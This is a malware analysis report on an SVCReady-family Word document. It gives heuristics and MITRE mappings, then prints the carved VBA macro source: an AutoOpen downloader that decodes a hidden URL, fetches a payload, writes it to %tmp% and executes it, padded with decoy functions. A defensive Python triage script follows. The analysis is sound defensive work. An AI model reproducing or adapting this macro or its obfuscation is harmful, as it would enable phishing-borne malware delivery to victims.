Verdict: MALICIOUS (risk score 210)

MITRE ATT&CK

- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment

Malware Insights

The sample is a malicious Word (OOXML) document carrying a VBA project with an AutoOpen subroutine, so the macro runs as soon as a user opens the file with macros enabled. The macro body is a downloader: it decodes two strings hidden in the first shape's AlternativeText and Title (keeping every third character), issues a synchronous GET for the decoded URL through MSXML2.XMLHTTP60, writes what the request returns to the temporary path %tmp%\main.theme (built from Environ("tmp")), and then runs the decoded Title string with that path as its argument via WshShell.exec. The many remaining functions only read harmless Word properties or compute constants and exist to pad and disguise the module. The ClamAV signature attributes it to the SVCReady downloader family. The external relationship to 'file:///C:\Framework\rels\builds\pack2\us.jpg' and the AutoOpen trigger are consistent with delivery as a spearphishing attachment.
Heuristics (7)

- ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0.
- External relationship (high, OOXML_EXTERNAL_REL). External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\us.jpg
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings). Document contains a VBA project; VBA macros present.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN). AutoOpen macro present, so the code runs on document open without user interaction beyond enabling macros.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents where source extraction fails, i.e. where the visible source is unavailable.
- Environ() call, environment variable access (low, OLE_VBA_ENVIRON). Here used as Environ("tmp") to build the drop path %tmp%\main.theme.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below is labelled "OOXML external relationship" by the extractor, but all of them are XML namespace URIs declared in word/document.xml by every modern Word build; they are not fetched and are not network indicators. The only genuine external target in this file is the file:/// relationship listed above.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4455 bytes | c700a3c930b07ca3c6082f8bb68fb157c8f46d5beb316f874fb87faa54f10bc5 |
Preview of macros.bas (first 1,000 lines of the extracted script; comments marked with ' are annotations, not part of the carved source):

```vba
' --- Module: ThisDocument (document class module; carries no code of its own) ---
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Module: d99a1ca5 (holds the AutoOpen entry point) ---
Attribute VB_Name = "d99a1ca5"
' The functions that only read Word properties or return constants are padding/decoys.
Function a733d386()
a733d386 = Application.ActiveDocument.Content
End Function
Function ba9c06fe()
ba9c06fe = ActiveWindow.DisplayScreenTips
End Function
Function c408892d()
c408892d = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function f6b1d6cd()
f6b1d6cd = Application.ActiveDocument.AutoSaveOn
End Function
' AutoOpen runs when the document is opened with macros enabled:
'   1. aaa        = decoded URL from Shapes(1).AlternativeText (a1564d4e over a03bb677)
'   2. b5077ec9   = HTTP GET of that URL (b77b79bf.d21ac916)
'   3. d69e39f7   = write the response to %tmp%\main.theme (path from c6ece1c8)
'   4. f10f67a7   = decoded launcher string from Shapes(1).Title
'   5. WshShell.exec "<launcher> <%tmp%\main.theme>"
Sub AutoOpen()
Dim c4df9c00 As New b77b79bf
aaa = a1564d4e(a03bb677)
b5077ec9 = c4df9c00.d21ac916(aaa, "")
d69e39f7 c6ece1c8, b5077ec9
f10f67a7 = a1564d4e(ActiveDocument.Shapes(1).Title)
Dim a0d73b7c As New WshShell
a0d73b7c.exec "" & f10f67a7 & " " & c6ece1c8
End Sub
' --- Module: f05c3c7e (file drop, path construction, string decoder) ---
Attribute VB_Name = "f05c3c7e"
Function f532ce66()
f532ce66 = ActiveWindow.Selection
End Function
Function b830af92()
b830af92 = Application.ActiveDocument.AutoSaveOn
End Function
Function a9f1409d(f1e34e6d As Long) As Long
Dim ee98be7d As Integer
For ee98be7d = 39 To 81 Step 4
f1e34e6d = f1e34e6d + ee98be7d
Next ee98be7d
a9f1409d = f1e34e6d
End Function
Function d2e2a69f()
d2e2a69f = ActiveWindow.DisplayVerticalScrollBar
End Function
' Writes the (StrConv-converted) payload to the given path.
Sub d69e39f7(d7d946c2, be5b76a6)
Dim d567869a
d567869a = FreeFile
Open d7d946c2 For Output As #d567869a
Print #d567869a, c76ac9c2(be5b76a6)
Close #d567869a
End Sub
' Drop path: %tmp%\main.theme (the Environ() call behind OLE_VBA_ENVIRON).
Function c6ece1c8()
c6ece1c8 = Environ("tmp") & "\main.theme"
End Function
Function b6faf152()
b6faf152 = -1125
End Function
Function b63f77a2()
b63f77a2 = ActiveWindow.Type
End Function
Function d3282763()
d3282763 = 0
End Function
Function c4f3a4bf(ac22e227 As Long) As Long
Dim c4eaa279 As Integer
For c4eaa279 = 36 To 75
ac22e227 = ac22e227 + c4eaa279
Next c4eaa279
c4f3a4bf = ac22e227
End Function
' String decoder: keeps the characters at positions 1, 4, 7, ... (every third character),
' so the hidden strings are padded with two junk characters after each real one.
Function a1564d4e(e0750ab5)
For eb4e509c = 1 To Len(e0750ab5) Step 3
dedeee31 = Mid(e0750ab5, eb4e509c, 1)
cf2857b2 = cf2857b2 & dedeee31
Next
a1564d4e = cf2857b2
End Function
Function b4f7f4e2()
b4f7f4e2 = 817789830 / 16511
End Function
Function e4b7eae4()
e4b7eae4 = Application.ActiveDocument.Creator
End Function
Function f0f8eaff(e1256506np As String) As Boolean
If Len(e1256506np) < 266 - 145 Then
f0f8eaff = True
End If
End Function
Function de325786()
de325786 = ActiveWindow.Document
End Function
Sub ed5e37b6()
End Sub
Function d10b81e2()
d10b81e2 = ActiveWindow.Creator
End Function
Function c4ab86fb()
c4ab86fb = 562 - 16
End Function
Function b530bf01()
b530bf01 = Application.ActiveDocument.ActiveTheme
End Function
Function be45e2ca()
be45e2ca = -1425425708
End Function
' StrConv(..., 64): 64 is vbUnicode, i.e. the response is converted before being written.
Function c76ac9c2(be5b76a6)
c76ac9c2 = StrConv(be5b76a6, 64)
End Function
Function b951e2d2()
b951e2d2 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function d44208c0()
d44208c0 = Application.ActiveDocument.ActiveWindow
End Function
Function fe1548c0()
fe1548c0 = ActiveWindow.DisplayVerticalScrollBar
End Function
Function a662018c()
a662018c = 60087.184817971
End Function
' The obfuscated URL lives in the first shape's alt text.
Function a03bb677()
a03bb677 = ActiveDocument.Shapes(1).AlternativeText
End Function
' --- Module: b77b79bf (class module; the HTTP downloader) ---
Attribute VB_Name = "b77b79bf"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function ec990895()
ec990895 = Application.ActiveDocument.AutoHyphenation
End Function
Function c2d6631b()
c2d6631b = ActiveWindow.StyleAreaWidth
End Function
Function dd5670db()
dd5670db = ActiveWindow.DisplayLeftScrollBar
End Function
Function d64b2607()
d64b2607 = ActiveWindow.Parent
End Function
' Synchronous GET via MSXML2.XMLHTTP60; the returned property is cut off in this preview.
Function d21ac916(bc692595, b53585d6)
Dim b3d025b9 As Object
Set b3d025b9 = New MSXML2.XMLHTTP60
Call b3d025b9.Open("GET", bc692595, False)
b3d025b9.Send
d21ac916 = b3d025b9.
```
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes | 6b9a0ef173ddc77650a04e71ad6c31dbe6f83d3375a7495f0eb2ff8ffd977906 |
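The two checks above that a practitioner most wants to reproduce offline are the OOXML_EXTERNAL_REL heuristic (relationships with TargetMode="External" in word/_rels/document.xml.rels) and the recovery of the strings the AutoOpen macro builds from the first shape: a1564d4e keeps every third character of Shapes(1).AlternativeText (the URL) and Shapes(1).Title (the launcher). The following Python is an added example, not code from the analyzer or from the sample; it assumes the shape is a DrawingML shape, so that Word exposes its Title as wp:docPr/@title and its AlternativeText as wp:docPr/@descr, and it runs against a constructed minimal .docx with a hypothetical URL and launcher string rather than against the real file:

```python
import html
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"


def decode_every_third(s: str) -> str:
    # Mirror of the macro's a1564d4e(): Mid(s, i, 1) for i = 1, 4, 7, ... (Step 3),
    # i.e. keep every third character starting with the first.
    return s[0::3]


def external_relationships(docx_bytes: bytes) -> list:
    # OOXML_EXTERNAL_REL: (Id, Target) for every relationship in
    # word/_rels/document.xml.rels whose TargetMode is "External".
    # Internal package parts never carry that mode.
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return []
        rels = z.read("word/_rels/document.xml.rels")
    root = ET.fromstring(rels)
    return [
        (rel.get("Id"), rel.get("Target"))
        for rel in root.iter(f"{{{REL_NS}}}Relationship")
        if rel.get("TargetMode") == "External"
    ]


def shape_strings(docx_bytes: bytes) -> list:
    # Assumption: DrawingML shapes, where Shape.Title is wp:docPr/@title and
    # Shape.AlternativeText is wp:docPr/@descr (legacy VML shapes differ).
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return [
        {"title": pr.get("title", ""), "descr": pr.get("descr", "")}
        for pr in root.iter(f"{{{WP_NS}}}docPr")
    ]


def triage(docx_bytes: bytes) -> dict:
    # What AutoOpen would reconstruct from Shapes(1), plus the external targets.
    shapes = shape_strings(docx_bytes)
    first = shapes[0] if shapes else {"title": "", "descr": ""}
    return {
        "external_targets": external_relationships(docx_bytes),
        "url": decode_every_third(first["descr"]),      # a1564d4e(a03bb677)
        "command": decode_every_third(first["title"]),  # a1564d4e(Shapes(1).Title)
    }


def obfuscate(s: str) -> str:
    # Inverse of decode_every_third(): two junk characters after each real one.
    return "".join(c + "#~" for c in s)


def build_sample_docx(url: str, command: str, external_target: str) -> bytes:
    # Constructed minimal .docx containing only the two parts the checks read.
    # It carries no macro; it only stages the strings the way the sample does.
    document_xml = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        f'xmlns:wp="{WP_NS}"><w:body><w:p><w:r><w:drawing><wp:inline>'
        f'<wp:docPr id="1" name="Picture 1" title="{html.escape(obfuscate(command), quote=True)}" '
        f'descr="{html.escape(obfuscate(url), quote=True)}"/>'
        "</wp:inline></w:drawing></w:r></w:p></w:body></w:document>"
    )
    rels_xml = (
        f'<Relationships xmlns="{REL_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{html.escape(external_target, quote=True)}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


SAMPLE = build_sample_docx(
    "http://example.invalid/stage2.bin",                   # hypothetical second-stage URL
    "placeholder-loader.exe",                              # hypothetical launcher string
    "file:///C:\\Framework\\rels\\builds\\pack2\\us.jpg",  # external target seen in this report
)

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it against a real sample by replacing SAMPLE with the bytes of the .docx; because the decoder is a pure slice, the same function works on whatever strings olevba or the document XML hand you, without executing the macro. If `shape_strings` returns nothing, the strings are probably held by a VML shape or the document is not DrawingML-based, and the attribute names need adjusting.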